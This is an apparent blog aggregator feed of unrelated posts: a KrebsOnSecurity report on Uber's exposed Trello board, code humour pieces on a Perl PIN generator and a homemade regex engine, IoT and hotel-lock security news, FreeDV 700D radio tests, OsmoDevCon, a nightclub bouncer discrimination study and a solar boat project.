Uber spokesperson Melanie Ensign said the Trello board in question was made private shortly after being notified by this publication, among others. Ensign said Uber found the unauthorized Trello board exposed information related to two users in South America who have since been notified.

“We had a handful of members in random parts of the world who didn’t realize they were openly sharing this information,” Ensign said. “We’ve reached out to these teams to remind people that these things need to happen behind internal resources. Employee awareness is an ongoing challenge. We may have dodged a bullet here, and it definitely could have been worse.”

Ensign said the initial report about the exposed board came through the company’s bug bounty program, and that the person who reported it would receive at least the minimum bounty amount — $500 — for reporting the incident (Uber hasn’t yet decided whether the award should be higher for this incident).

The Uber employees who created the board “used their work email to open a public board that they weren’t supposed to,” Ensign said. “They didn’t go through our enterprise account to create that. We first found out about it through our bug bounty program, and while it’s not technically a vulnerability in our products, it’s certainly something that we would pay for anyway. In this case, we got multiple reports about the same thing, but we always pay the first report we get.”

Of course, not every company has a bug bounty program to incentivize the discovery and private reporting of internal resources that may be inadvertently exposed online.

Screenshots that KrebsOnSecurity took of many far more shocking examples of employees posting dozens of passwords for sensitive internal resources are not pictured here because the affected parties still have not responded to alerts provided by this author.

Trello is one of many online collaboration tools made by Atlassian Corporation PLC, a technology company based in Sydney, Australia. Trello co-founder Michael Pryor said Trello boards are set to private by default and must be manually changed to public by the user.

“We strive to make sure public boards are being created intentionally and have built in safeguards to confirm the intention of a user before they make a board publicly visible,” Pryor said. “Additionally, visibility settings are displayed persistently on the top of every board.”

If a board is Team Visible it means any members of that team can view, join, and edit cards. If a board is Private, only members of that specific board can see it. If a board is Public, anyone with the link to the board can see it.

Interestingly, updates made to Trello’s privacy policy over the past weekend may make it easier for companies to locate personal boards created by employees and pull them behind company resources.

A Trello spokesperson said the privacy changes were made to bring the company’s policies in line with new EU privacy laws that come into enforcement later this month. But they also clarify that Trello’s enterprise features allow the enterprise admins to control the security and permissions around a work account an employee may have created before the enterprise product was purchased.

Uber spokesperson Ensign called the changes welcome.

“As a result companies will have more security control over Trello boards created by current/former employees and contractors, so we’re happy to see the change,” she said.

KrebsOnSecurity would like to thank security researcher Kushagra Pathak for the heads up about the unauthorized Uber board. Pathak has posted his own account of the discovery here.

Update: Added information from Ensign about two users who had their data exposed from the credentials in the unauthorized Trello page published by Uber employees.

Rondam RamblingsThis is inspiring

The Washington Post reports that: Two African American men arrested at a Philadelphia Starbucks last month have reached a settlement with the city and secured its commitment to a pilot program for young entrepreneurs.  Rashon Nelson and Donte Robinson chose not to pursue a lawsuit against the city, Mike Dunn, a spokesman from the Mayor’s Office, told The Washington Post. Instead, they agreed to

TEDCalling all social entrepreneurs + nonprofit leaders: Apply for The Audacious Project

Our first collection of Audacious Project winners takes the stage after a stellar session at TED2018, in which each winner made a big, big wish to move their organization’s vision to the next level with help from a new consortium of nonprofits. As a bonus during the Audacious Project session, we watched an astonishing performance of “New Second Line” from Camille A. Brown and Dancers. From left: The Bail Project’s Robin Steinberg; Heidi M. Sosik of the Woods Hole Oceanographic Institute; Caroline Harper of Sight Savers; Vanessa Garrison and T. Morgan Dixon of GirlTrek; Fred Krupp from the Environmental Defense Fund; Chloe Davis and Maleek Washington of Camille A. Brown and Dancers; pianist Scott Patterson; Andrew Youn of the One Acre Fund; and Catherine Foster, Camille A. Brown, Timothy Edwards, Juel D. Lane from Camille A. Brown and Dancers. Obscured behind Catherine Foster is Raj Panjabi of Last Mile Health (and dancer Mayte Natalio is offstage). Photo: Ryan Lash / TED

Creating wide-scale change isn’t easy. It takes incredible passion around an issue, and smart ideas on how to move the needle and, hopefully, improve people’s lives. It requires bottomless energy, a dedicated team, an extraordinary amount of hope. And, of course, it demands real resources.

TED would like to help, on the last part at least. This is an open invitation to all social entrepreneurs and nonprofit leaders: apply to be a part of The Audacious Project in 2019. We’re looking for big, bold, unique ideas that are capable of affecting more than a million people or driving transformational change on a key issue. We’re looking for unexplored plans that have a real, credible path to execution. That can inspire people around the world to come together to act.

Applications for The Audacious Project are open now through June 10. And here’s the best part — this isn’t a long, detailed grant application that will take hours to complete. We’ve boiled it down to the essential questions that can be answered swiftly. So apply as soon as you can. If your idea feels like a good fit, we’ll be in touch with an extended application that you’ll have four weeks to complete.

The Audacious Project process is rigorous — if selected as a Finalist, you’ll participate in an ideation workshop to help clarify your approach and work with us and our partners on a detailed project proposal spanning three to five years. But the work will be worth it, as it can turbocharge your drive toward change.

More than $406 million has already been committed to the first ideas in The Audacious Project. And further support is coming in following the simultaneous launch of the project at both TED2018 and the annual Skoll World Forum last week. Watch the full session from TED, or the highlight reel above, which screened the next day at Skoll. And who knows? Perhaps you'll be a part of the program in 2019.

CryptogramNIST Issues Call for "Lightweight Cryptography" Algorithms

This is interesting:

Creating these defenses is the goal of NIST's lightweight cryptography initiative, which aims to develop cryptographic algorithm standards that can work within the confines of a simple electronic device. Many of the sensors, actuators and other micromachines that will function as eyes, ears and hands in IoT networks will work on scant electrical power and use circuitry far more limited than the chips found in even the simplest cell phone. Similar small electronics exist in the keyless entry fobs to newer-model cars and the Radio Frequency Identification (RFID) tags used to locate boxes in vast warehouses.

All of these gadgets are inexpensive to make and will fit nearly anywhere, but common encryption methods may demand more electronic resources than they possess.

The NSA's SIMON and SPECK would certainly qualify.

Worse Than FailureCodeSOD: A Password Generator

Every programming language has a *bias* which informs its solutions. Object-oriented languages are biased towards objects, and all the things which follow on. Clojure is all about function application. Haskell is all about type algebra. Ruby is all about monkey-patching existing objects.

In any language, these things can be taken too far. Java's infamous Spring framework leaps to mind. Perl, being biased towards regular expressions, has earned its reputation as being "write only" thanks to regex abuse.

Gert sent us along some Perl code, and I was expecting to see regexes taken too far. To my shock, there weren't any regexes.

Gert's co-worker needed to generate a random 6-digit PIN for a voicemail system. It didn't need to be cryptographically secure, and repeats and zeros were allowed (they exist on a keypad, after all!). The Perl approach for doing this would normally be something like:


sub randomPIN {
  return sprintf("%06u",int(rand(1000000)));
}

Gert's co-worker had a different plan in mind, though.


sub randomPIN {
my $password;
my @num = (1..9);
my @char = ('@','#','$','%','^','&','*','(',')');
my @alph = ('a'..'z');
my @alph_up = ('A'..'Z');

my $rand_num1 = $num[int rand @num];
my $rand_num2 = $num[int rand @num];
my $rand_num3 = $num[int rand @num];
my $rand_num4 = $num[int rand @num];
my $rand_num5 = $num[int rand @num];
my $rand_num6 = $num[int rand @num];

$password = "$rand_num1"."$rand_num2"."$rand_num3"."$rand_num4"."$rand_num5"."$rand_num6";

return $password;
}

This code starts by creating a set of arrays, @num, @char, etc. The only one that matters is @num, though, since this generates a PIN to be entered on a phone keypad: touchtone signals are numeric, and there is no "(" key on a telephone keypad. Obviously, the developer copied this code from a random password function somewhere, which is its own special kind of awful.

Now, what's fascinating is that they initialize @num with the numbers 1 through 9, and then use the rand function to generate a random index from 0 through 8, so that they can select an item from the array. So they understood how the rand function worked, but couldn't make the leap to eliminate the array with something like int(rand(9)) + 1.
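For what it's worth, here is a minimal sketch of that missing leap (the subroutine name is mine, not something from Gert's codebase): once you know int(rand(N)) yields an integer from 0 to N-1, the lookup array disappears entirely.

sub randomPIN_digits {
    # Same behaviour as the original (six digits, each from 1 to 9),
    # without the lookup array: int(rand(9)) gives 0..8, so add 1.
    return join '', map { 1 + int rand 9 } 1 .. 6;
}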

For now, replacing this function is simply on Gert's todo list.


,

CryptogramIoT Inspector Tool from Princeton

Researchers at Princeton University have released IoT Inspector, a tool that analyzes the security and privacy of IoT devices by examining the data they send across the Internet. They've already used the tool to study a bunch of different IoT devices. From their blog post:

Finding #3: Many IoT Devices Contact a Large and Diverse Set of Third Parties

In many cases, consumers expect that their devices contact manufacturers' servers, but communication with other third-party destinations may not be a behavior that consumers expect.

We have found that many IoT devices communicate with third-party services, of which consumers are typically unaware. We have found many instances of third-party communications in our analyses of IoT device network traffic. Some examples include:

  • Samsung Smart TV. During the first minute after power-on, the TV talks to Google Play, Double Click, Netflix, FandangoNOW, Spotify, CBS, MSNBC, NFL, Deezer, and Facebook, even though we did not sign in or create accounts with any of them.

  • Amcrest WiFi Security Camera. The camera actively communicates with cellphonepush.quickddns.com using HTTPS. QuickDDNS is a Dynamic DNS service provider operated by Dahua. Dahua is also a security camera manufacturer, although Amcrest's website makes no references to Dahua. Amcrest customer service informed us that Dahua was the original equipment manufacturer.

  • Halo Smoke Detector. The smart smoke detector communicates with broker.xively.com. Xively offers an MQTT service, which allows manufacturers to communicate with their devices.

  • Geeni Light Bulb. The Geeni smart bulb communicates with gw.tuyaus.com, which is operated by TuYa, a China-based company that also offers an MQTT service.

We also looked at a number of other devices, such as Samsung Smart Camera and TP-Link Smart Plug, and found communications with third parties ranging from NTP pools (time servers) to video storage services.

Their first two findings are that "Many IoT devices lack basic encryption and authentication" and that "User behavior can be inferred from encrypted IoT device traffic." No surprises there.

Boingboing post.

Related: IoT Hall of Shame.

Worse Than FailureAn Obvious Requirement

Requirements. That magical set of instructions that tell you specifically what you need to build and test. Users can't be bothered to write them, and even if they could, they have no idea how to tell you what they want. It doesn't help that many developers are incapable of following instructions since they rarely exist, and when they do, they usually aren't worth the coffee-stained napkin upon which they're scribbled.

A sign warning that a footpath containing stairs isn't suitable for wheelchairs

That said, we try our best to build what we think our users need. We attempt to make it fairly straightforward to use what we build. The button marked Reports most likely leads to something to do with generating/reading/whatever-ing reports. Of course, sometimes a particular feature is buried several layers deep and requires multiple levels of ribbons, menus, sub-menus, dialogs, sub-dialogs and tabs before you find the checkbox you want. Since we developers, as a group, are by nature somewhat anal retentive, we try to keep related features grouped so that you can generally guess what path to try to find something. And we often supply a Help feature to tell you how to find it when you can't.

Of course, some people simply cannot figure out how to use the software we build, no matter how sensibly it's laid out and organized, or how many hints and help features we provide. And there is nothing in the history of computer science that addresses how to change this. Nothing!

Dimitri C. had a user who wanted a screen that performed several actions. The user provided requirements in the form of a printout of a similar dialog he had used in a previous application, along with a list of changes/colors/etc. They also provided some "helpful" suggestions, along the lines of, "It should be totally different, but exactly the same as the current application." Dimitri took pains to organize the actions and information in appropriate hierarchical groups. He laid out appropriate controls in a sensible way on the screen. He provided a tooltip for each control and a Help button.

Shortly after delivery, a user called to complain that he couldn't find a particular feature. Dimitri asked "Have you tried using the Help button?" The user said that "I can't be bothered to read the instructions in the help tool because accessing this function should be obvious".

Dimitri asked him "Have you looked on the screen for a control with the relevant name?" The user complained that "There are too many controls, and this function should be obvious". Dimitri asked "Did you try to hover your mouse over the controls to read the tooltips?" The user complained that "I don't have the time to do that because it would take too long!" (yet he had the time to complain).

Frustrated, Dimitri replied "To make that more obvious, should I make these things less obvious?". The user complained that "Everything should be obvious". Dimitri asked how that could possibly be done, to which the user replied "I don't know, that's your job".

When he realized that this user had no clue how to ask for what he wanted, he asked how this feature worked in previous programs, to which the user replied "I clicked this, then this, then this, then this, then this, then restarted the program".

Dimitri responded that "That's six steps instead of the two in my program, and that would require you to reenter some of the data".

The user responded "Yes, but it's obvious".

So is the need to introduce that type of user to the business end of a clue-bat.


Cory DoctorowBoston, Chicago and Waterloo, I’m heading your way!

This Wednesday at 11:45am, I’ll be giving the IDE Lunch Seminar at MIT’s Sloan School of Management, 100 Main Street.


From there, I head to Chicago to keynote Thotcon on Friday at 11am.

My final stop on this trip is Waterloo’s Perimeter Institute for Theoretical Physics, May 9 at 2PM.

I hope to see you! I’ve got plenty more appearances planned this season, including Santa Fe, Phoenix, San Jose, Boston, San Diego and Pasadena!

,

Planet Linux AustraliaDavid Rowe: FreeDV 700D Part 3

After a 1 year hiatus, I am back into FreeDV 700D development, working to get the OFDM modem, LDPC FEC, and interleaver algorithms developed last year into real time operation. The aim is to get improved performance on HF channels over FreeDV 700C.

I’ve been doing lots of refactoring, algorithm development, fixing bugs, tuning, and building up layers of C code so we can get 700D on the air.

Steve ported the OFDM modem to C – thanks Steve!

I’m building up the software in the form of command line utilities, some notes, examples and specifications in Codec 2 README_ofdm.txt.

Last week I stayed at the shack of Chris, VK5CP, in a quiet rural location at Younghusband on the river Murray. As well as testing my Solar Boat, Mark (VK5QI) helped me test FreeDV 700D. This was the first time the C code software has been tested over a real HF radio channel.

We transmitted signals from Younghusband, and received them at a remote SDR in Sydney (about 1300km away), downloading wave files of the received signal for off-line analysis.

After some tweaking, it worked! The frequency offset was a bit off, so I used the cohpsk_ch utility to shift it within the +/- 25Hz acquisition range of the FreeDV 700D demodulator. I also found some level sensitivity issues with the LDPC decoder. After implementing a form of AGC, the number of bit errors dropped by a factor of 10.
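The post doesn't show the AGC code, but the idea is simple enough: scale the received symbols to a known level before they reach the LDPC decoder, so its soft-decision metrics aren't thrown off by receiver gain. A minimal sketch of that kind of normalisation, written in Perl here just for illustration (this is my own sketch, not the actual codec2 implementation):

# Illustrative only: normalise a block of received symbol amplitudes to
# unit RMS so the decoder sees a consistent signal level.
sub agc_normalise {
    my @symbols = @_;
    my $power = 0;
    $power += $_ ** 2 for @symbols;
    my $rms = sqrt($power / @symbols);
    $rms = 1 if $rms == 0;      # avoid dividing by zero during a deep fade
    return map { $_ / $rms } @symbols;
}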

The channel had nasty fading of around 1Hz, here is a video of the “sample #32” spectrum bouncing around. This rapid fading is a huge challenge for modems. Note also the spurious birdie off to the left, and the effect of receiver AGC – the noise level rises during fades.

Here is a spectrogram of the same sample 33. The x axis is time in seconds. It's like a "waterfall" SDR plot on its side. Note the heavy "barber pole" fading, which corresponds to the fades sweeping across the spectrum in the video above.

Here is the smoothed SNR estimate. The SNR is a moving target for real world HF channels; here it moves between 2 and 6dB.

FreeDV 700D was designed to work down to 2dB on HF fading channels so pat on the back for me! Hundreds of hours of careful development and testing meant this thing actually worked when it went on air….

Sample 32 is a longer file that contains test frames instead of coded voice. The QPSK scatter diagram is a messy cross, typical of fading channels, as the amplitude of the signal moves in and out:

The LDPC FEC does a good job. Here are plots of the uncoded (raw) bit errors, and the bit errors after LDPC decoding, with the SNR estimates below:

Here are some wave and raw (headerless) audio files. The off air audio is error free, albeit at the low quality of Codec 2 at 700 bits/s. The goal of this work is to get intelligible speech through HF channels at low SNRs. We’ll look at improving the speech quality as a future step.

Still, error free digital voice on a heavily faded HF channel at 2dB SNR is pretty cool.

See below for how to use the last two raw file samples.

  • Sample 33 off air modem signal
  • Sample 33 decoded voice
  • Sample 32 off air test frames raw file
  • Sample 33 off air voice raw file

SNR estimation

After I sampled the files I had a problem – I needed to know the SNR. You see in my development I use simulated channels where I know exactly what the SNR is. I need to compare the performance of the real world, off-air signals to my expected results at a given SNR.

Unfortunately SNR on a fading channel is a moving target. In simulation I measure the total power and noise over the entire run, and the simulated fading channel is consistent. Real world channels jump all over the place as the ionosphere bounces around. Oh well, knowing we are in the ball park is probably good enough. We just need to know if FreeDV 700D is hanging onto real world HF channels at roughly the SNRs it was designed for.

I came up with a way of measuring SNR, and tested it with a range of simulated AWGN (just noise) and fading channels. The fading bandwidth is the speed at which the fading channel evolves. Slow fading channels might change at 0.2Hz, faster channels, like samples #32 and #33, at about 1Hz.

The blue line is the ideal, and on AWGN and slowly fading channels my SNR estimator does OK. It reads a dB low as the fading bandwidth increases to 1Hz. We are interested in the -2 to 4dB SNR range.

Command Lines

With the samples listed above and codec2-dev SVN rev 3465, you can repeat some of my decodes using Octave and C:

octave:42> ofdm_ldpc_rx("32.raw")
EsNo fixed at 3.000000 - need to est from channel
Coded BER: 0.0010 Tbits: 54992 Terrs:    55
Codec PER: 0.0097 Tpkts:  1964 Terrs:    19
Raw BER..: 0.0275 Tbits: 109984 Terrs:  3021

david@penetrator:~/codec2-dev/build_linux/src$ ./ofdm_demod ../../octave/32.raw /dev/null -t --ldpc
Warning EsNo: 3.000000 hard coded
BER......: 0.0246 Tbits: 116620 Terrs:  2866
Coded BER: 0.0009 Tbits: 54880 Terrs:    47

build_linux/src$ ./freedv_rx 700D ../../octave/32.raw /dev/null --testframes
BER......: 0.0246 Tbits: 116620 Terrs:  2866
Coded BER: 0.0009 Tbits: 54880 Terrs:    47

build_linux/src$ ./freedv_rx 700D ../../octave/33.raw  - | aplay -f S16

Next Steps

I’m working steadily towards integrating FreeDV 700D into the FreeDV GUI program so anyone can try it. This will be released in May 2018.

Reading Further

Towards FreeDV 700D
FreeDV 700D – First Over The Air Tests
Steve Ports an OFDM modem from Octave to C
Codec 2 README_ofdm.txt

CryptogramSecurity Vulnerabilities in VingCard Electronic Locks

Researchers have disclosed a massive vulnerability in the VingCard electronic lock system, used in hotel rooms around the world:

With a $300 Proxmark RFID card reading and writing tool, any expired keycard pulled from the trash of a target hotel, and a set of cryptographic tricks developed over close to 15 years of on-and-off analysis of the codes Vingcard electronically writes to its keycards, they found a method to vastly narrow down a hotel's possible master key code. They can use that handheld Proxmark device to cycle through all the remaining possible codes on any lock at the hotel, identify the correct one in about 20 tries, and then write that master code to a card that gives the hacker free rein to roam any room in the building. The whole process takes about a minute.

[...]

The two researchers say that their attack works only on Vingcard's previous-generation Vision locks, not the company's newer Visionline product. But they estimate that it nonetheless affects 140,000 hotels in more than 160 countries around the world; the researchers say that Vingcard's Swedish parent company, Assa Abloy, admitted to them that the problem affects millions of locks in total. When WIRED reached out to Assa Abloy, however, the company put the total number of vulnerable locks somewhat lower, between 500,000 and a million.

Patching is a nightmare. It requires updating the firmware on every lock individually.

And the researchers speculate whether or not others knew of this hack:

The F-Secure researchers admit they don't know if their Vinguard attack has occurred in the real world. But the American firm LSI, which trains law enforcement agencies in bypassing locks, advertises Vingcard's products among those it promises to teach students to unlock. And the F-Secure researchers point to a 2010 assassination of a Palestinian Hamas official in a Dubai hotel, widely believed to have been carried out by the Israeli intelligence agency Mossad. The assassins in that case seemingly used a vulnerability in Vingcard locks to enter their target's room, albeit one that required re-programming the lock. "Most probably Mossad has a capability to do something like this," Tuominen says.

Slashdot post.

Worse Than FailureCodeSOD: Philegex

Last week, I was doing some graphics programming without a graphics card. It was low resolution, so I went ahead and re-implemented a few key methods from the OpenGL Shading Language in a fashion which was compatible with NumPy arrays. Lucky for me, I was able to draw on many years of experience, I understood both technologies, and they both have excellent documentation which made it easy. After dozens of lines of code, I was able to whip up some pretty flexible image generator functions. I knew the tools I needed, I understood how they worked, and while I was reinventing a wheel, I had a very specific reason.

Philemon Eichin sends us some code from a point in his career where none of these things were true.

Philemon was building a changelog editor. As such, he wanted an easy, flexible way to identify patterns in the text. Philemon knew that there was something that could do that job, but he didn't know what it was called or how it was supposed to work. So, like all good programmers, Philemon went ahead and coded up what he needed: he invented his own regular expression language, and built his own parser for it.

Thus was born Philegex. Philemon knew that regexes involved slashes, so in his language you needed to put a slash in front of every character you wanted to match exactly. He knew that it involved question marks, so he used the question mark as a wildcard which could match any character. That left the "|" character to mark the preceding token as optional.

So, for example: /P/H/I/L/E/G/E/X|??? would match “PHILEGEX!!!” or “PHILEGEWTF”. A date could be described as: nnnn/.nn/.nn. (YYYY.MM.DD or YYYY.DD.MM)
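For readers who already speak regex, here is roughly what those two Philegex patterns say in standard Perl syntax (my translation, inferred from the parser below, assuming "?" matches any single character, "n" matches a digit, and "|" makes the preceding token optional):

# Rough standard-regex equivalents of the Philegex examples above.
my $philegex_example = qr/PHILEGEX?.{3}/;        # /P/H/I/L/E/G/E/X|???
my $date_example     = qr/\d{4}\.\d{2}\.\d{2}/;  # nnnn/.nn/.nn

print "matches\n" if 'PHILEGEWTF' =~ $philegex_example;
print "matches\n" if '2018.05.04' =~ $date_example;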

Living on his own isolated island without access to the Internet to attempt to google up “How to match patterns in text”, Philemon invented his own language for describing parts of a regular expression. This will be useful to interpret the code below.

Philegex      Regex
Maskable      Matches
p1            Pattern / Regex
Block(s)      Token(s)
CT            CharType
SplitLine     ParseRegex
CC            currentChar
auf_zu        openParenthesis
Chars         CharClassification

With the preamble out of the way, enjoy Philemon’s approach to regular expressions, implemented elegantly in VB.Net.

Public Class Textmarker
    Const Datum As String = "nn/.nn/.nnnn"

    Private Structure Blocks
        Dim Type As Chars
        Dim Multi As Boolean
        Dim Mode As Char_Mode
        Dim Subblocks() As Blocks
        Dim passed As Boolean
        Dim _Optional As Boolean
    End Structure



    Public Shared Function IsMaskable(p1 As String, Content As String) As Boolean
        Dim ID As Integer = 0
        Dim p2 As Chars
        Dim _Blocks() As Blocks = SplitLine(p1)
        For i As Integer = 0 To Content.Length - 1
            p2 = GetCT(Content(i))
START_CASE:
            '#If CONFIG = "Debug" Then
            '            If ID = 2 Then
            '                Stop
            '            End If

            '#End If
            If ID > _Blocks.Length - 1 Then
                Return False
            End If
            Select Case _Blocks(ID).Mode
                Case Char_Mode._Char
                    If p2.Char_V = _Blocks(ID).Type.Char_V Then
                        _Blocks(ID).passed = True
                        If Not _Blocks(ID).Multi = True Then ID += 1
                        Exit Select
                    Else
                        If _Blocks(ID).passed = True And _Blocks(ID).Multi = True Then
                            ID += 1
                            GoTo START_CASE
                        Else
                            If Not _Blocks(ID)._Optional Then Return False

                        End If
                    End If
                Case Char_Mode.Type
                    If _Blocks(ID).Type.Type = Chartypes.any Then
                        _Blocks(ID).passed = True
                        If Not _Blocks(ID).Multi = True Then ID += 1
                        Exit Select
                    Else


                        If p2.Type = _Blocks(ID).Type.Type Then
                            _Blocks(ID).passed = True
                            If Not _Blocks(ID).Multi = True Then ID += 1
                            Exit Select
                        Else
                            If _Blocks(ID).passed = True And _Blocks(ID).Multi = True Then
                                ID += 1
                                GoTo START_CASE
                            Else
                                If _Blocks(ID)._Optional Then
                                    ID += 1
                                    _Blocks(ID - 1).passed = True
                                Else
                                    Return False

                                End If

                            End If
                        End If

                    End If


            End Select


        Next
        For i = ID To _Blocks.Length - 1
            If _Blocks(ID)._Optional = True Then
                _Blocks(ID).passed = True
            Else
                Exit For
            End If
        Next
        If _Blocks(_Blocks.Length - 1).passed Then
            Return True
        Else
            Return False
        End If

    End Function

    Private Shared Function GetCT(Char_ As String) As Chars

        If "0123456789".Contains(Char_) Then Return New Chars(Char_, 2)
        If "qwertzuiopüasdfghjklöäyxcvbnmß".Contains((Char.ToLower(Char_))) Then Return New Chars(Char_, 1)
        Return New Chars(Char_, 4)
    End Function


    Private Shared Function SplitLine(ByVal Line As String) As Blocks()
        Dim ret(0) As Blocks
        Dim retID As Integer = -1
        Dim CC As Char
        For i = 0 To Line.Length - 1
            CC = Line(i)
            Select Case CC
                Case "("
                    ReDim Preserve ret(retID + 1)
                    retID += 1
                    Dim ii As Integer = i + 1
                    Dim auf_zu As Integer = 1
                    Do
                        Select Case Line(ii)
                            Case "("
                                auf_zu += 1
                            Case ")"
                                auf_zu -= 1
                            Case "/"
                                ii += 1
                        End Select
                        ii += 1
                    Loop Until auf_zu = 0
                    ret(retID).Subblocks = SplitLine(Line.Substring(i + 1, ii - 1))
                    ret(retID).Mode = Char_Mode.subitems
                    ret(retID).passed = False

                Case "*"
                    ret(retID).Multi = True
                    ret(retID).passed = False
                Case "|"
                    ret(retID)._Optional = True

                Case "/"
                    ReDim Preserve ret(retID + 1)
                    retID += 1
                    ret(retID).Mode = Char_Mode._Char
                    ret(retID).Type = New Chars(Line(i + 1), Chartypes.other)
                    i += 1
                    ret(retID).passed = False

                Case Else

                    ReDim Preserve ret(retID + 1)
                    retID += 1
                    ret(retID).Mode = Char_Mode.Type
                    ret(retID).Type = New Chars(Line(i), TocType(CC))
                    ret(retID).passed = False
            End Select
        Next
        Return ret
    End Function
    Private Shared Function TocType(p1 As Char) As Chartypes
        Select Case p1
            Case "c"
                Return Chartypes._Char
            Case "n"
                Return Chartypes.Number
            Case "?"
                Return Chartypes.any
            Case Else
                Return Chartypes.other
        End Select
    End Function

    Public Enum Char_Mode As Integer
        Type = 1
        _Char = 2
        subitems = 3
    End Enum
    Public Enum Chartypes As Integer
        _Char = 1
        Number = 2
        other = 4
        any
    End Enum
    Structure Chars
        Dim Char_V As Char
        Dim Type As Chartypes
        Sub New(Char_ As Char, typ As Chartypes)
            Char_V = Char_
            Type = typ
        End Sub
    End Structure
End Class

I'll say this: building a finite state machine, which is what the core of a regex engine is, is perhaps the only case where using a GoTo could be considered acceptable. So this code has that going for it. Philemon was kind enough to share this code with us, so we know he knows it's bad.


Planet Linux AustraliaOpenSTEM: Be Gonski Ready!

Gonski is in the news again with the release of the Gonski 2.0 report. This is most likely to impact on schools and teachers in a range of ways from funding to curriculum. Here at OpenSTEM we can help you to be ahead of the game by using our materials, which are already Gonski-ready! The […]

,

Harald WelteOsmoDevCon 2018 retrospective

One week ago, the annual Osmocom developer meeting (OsmoDevCon 2018) concluded after four long and intense days with old and new friends (the schedule can be seen here).

It was already the 7th incarnation of OsmoDevCon, and I have to say that it's really great to see the core Osmocom community come together every year, to share their work and experience with their fellow hackers.

Ever since the beginning we've had the tradition that we look beyond our own projects. In 2012, David Burgess was presenting on OpenBTS. In 2016, Ismael Gomez presented about srsUE + srsLTE, and this year we've had the pleasure of having Sukchan Kim coming all the way from Korea to talk to us about his nextepc project (a FOSS implementation of the Evolved Packet Core, the 4G core network).

What has also been a regular "entertainment" part in recent years are the field trip reports to various [former] satellite/SIGINT/... sites by Dimitri Stolnikov.

All in all, the event has become at least as much about the people as about the technology. It's a community of like-minded people who, at least in part, are still working on joint projects, but often work independently and scratch their own itch - whether open source mobile comms related or not.

After some criticism last year, the so-called "unstructured" part of OsmoDevCon has received more time again this year, allowing for exchange among the participants irrespective of any formal / scheduled talk or discussion topic.

In 2018, with the help of c3voc, for the first time ever, we've recorded most of the presentations on video. The results are still in the process of being cut, but are starting to appear at https://media.ccc.de/c/osmodevcon2018

If you want to join a future OsmoDevCon in person: Make sure you start contributing to any of the many Osmocom member projects now to become eligible. We need you!

Now the sad part is that it will take one entire year until we reconvene. May the Osmocom Developer community live long and prosper. I want to meet you guys for many more years at OsmoDevCon!

There is of course the user-oriented OsmoCon 2018 in October, but that's of course a much larger event with a different audience.

Nevertheless, I'm very much looking forward to that, too.

The OsmoCon 2018 Call for Participation is still running. Please consider submitting talks if you have anything open source mobile communications related to share!

Sociological ImagesBouncers and Bias

Originally Posted at TSP Discoveries

Whether we wear stilettos or flats, jeans or dress clothes, our clothing can allow or deny us access to certain social spaces, like a nightclub. Yet, institutional dress codes that dictate who can and cannot wear certain items of clothing target some marginalized communities more than others. For example, recent reports of bouncers denying Black patrons entry to nightclubs prompted Reuben A Buford May and Pat Rubio Goldsmith to test whether urban nightclubs in Texas deny entrance to Black and Latino men through discriminatory dress code policies.

Photo Credit: Bruce Turner, Flickr CC

For the study, recently published in Sociology of Race and Ethnicity, the authors recruited six men between the ages of 21 and 23. They selected three pairs of men by race — White, Black, and Latino — to attend 53 urban nightclubs in Dallas, Houston, and Austin. Each pair shared similar racial, socioeconomic, and physical characteristics. One individual from each pair dressed as a “conformist,” wearing Ralph Lauren polos, casual shoes, and nice jeans that adhered to the club’s dress code. The other individual dressed in stereotypically urban dress, wearing “sneakers, blue jean pants, colored T-shirt, hoodie, and a long necklace with a medallion.” The authors categorized an interaction as discrimination if a bouncer denied a patron entrance based on his dress or if the bouncer enforced particular dress code rules, such as telling a patron to tuck in their necklace. Each pair attended the same nightclub at peak hours three to ten minutes apart. The researchers exchanged text messages with each pair to document any denials or accommodations.

Black men were denied entrance into nightclubs 11.3 percent of the time (six times), while White and Latino men were both denied entry 5.7 percent of the time (three times). Bouncers claimed the Black patrons were denied entry because of their clothing, despite allowing similarly dressed White and Latino men to enter. Even when bouncers did not deny entrance, they demanded that patrons tuck in their necklaces to accommodate nightclub policy. This occurred two times for Black men, three times for Latino men, and one time for White men. Overall, Black men encountered more discriminatory experiences from nightclub bouncers, highlighting how institutions continue to police Black bodies through seemingly race-neutral rules and regulations.

Amber Joy is a PhD student in sociology at the University of Minnesota. Her current research interests include punishment, sexual violence and the intersections of race, gender, age, and sexuality. Her work examines how state institutions construct youth victimization.

Planet Linux AustraliaDavid Rowe: Solar Boat

Two years ago when I bought my Hartley TS16 sail boat I dreamed of converting it to solar power. In January I installed a Torqueedo electric outboard and a 24V, 100AH Lithium battery pack. That’s working really well. Next step was to work out a way to mount some surplus 200W solar panels on the boat. The idea is to (temporarily) detach the mast, and use the boat on the river Murray, a major river that passes within 100km of where I live in Adelaide, South Australia.

Over the last few weeks I worked with my friend Gary (VK5FGRY) to mount solar panels on the TS16. Gary designed and fabricated some legs from 40mm square aluminium:

With a matching rubber foot on each leg, the panels sit firmly on the gel coat of the boat, and are held down by ropes or octopus straps.

The panels’ maximum power point is at 28.5V (and 7.5A), which is close to the battery pack under charge (3.3*8 = 26.4V), so I decided to try a direct DC connection – no inverter or charger. I ran some tests in the back yard: each panel was delivering about 4A into the battery pack, and two in parallel delivered about 8A. I didn’t know solar panels could be connected in parallel, but happily this means I can keep my direct DC connection. Horizontal panels cost a few amps – a good example of why solar panels are usually angled at the sun. However the azimuth of the boat will always be changing, so horizontal is the only choice. The panels are very sensitive to shadowing; a hand placed on a panel, or a small shadow, is enough to drop the current to 0A. OK, so now I had a figure for panel output – about 4A from each panel.

This didn’t look promising. Based on my sea voyages with the Torqueedo, I estimated I would need 800W (about 30A) to maintain my target houseboat speed of 4 knots (7 km/hr); that’s 8 panels which won’t fit on my boat! However the current draw on the river might be different without tides and waves, and I wasn’t sure exactly how many AH I would get over a day from the sun. Would trees on the river bank shadow the panels?

So it was off to Younghusband on the Murray, where our friend Chris (VK5CP) was hosting a bunch of Ham Radio guys for an extended Anzac day/holiday weekend. It’s Autumn here, with generally sunny days of about 23C. The sun is up from 6:30am to 6pm.

Turns out that even with two panels – the solar boat was really practical! Over three days we made three trips of 2 hours each, at speeds of 3 to 4 knots, using only the panels for charging. Each day I took friends out, and they really loved it – so quiet and peaceful, and the river scenery is really nice.

After an afternoon cruise I would park the boat on the South side of the river to catch the morning sun, which in Autumn appears to the North here in Australia. I measured the panel current as 2A at 7am, 6A at 9am, 9A at 10am, and much to my surprise the pack was charged by 11am! In fact I had to disconnect the panels as the cell voltage was pushing over 4V.

